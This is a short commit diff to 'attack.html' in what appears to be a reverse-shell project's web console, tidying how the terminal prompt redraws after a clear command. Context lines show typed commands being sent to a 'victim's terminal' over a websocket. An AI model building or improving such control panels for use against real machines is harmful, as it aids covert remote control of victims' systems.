Improve clear even more

--- a/reverse_shell/templates/attack.html
+++ b/reverse_shell/templates/attack.html
@@ -130,14 +130,17 @@
       }
       else if (command === 'cls') {
         term.clear();
+        // Delete whole line
+        term.write('\x1b[2K\r');
+        term.write('$ ');
       }
       else {
+        term.write('\r\n$ ');
         // Send command to victim's terminal via websocket.
         webSocket.send(JSON.stringify({
               'message': command
           }));
       }
-      term.write('\r\n$ ');
       index = command_history.length;
       command = '';
       cursor = 0;
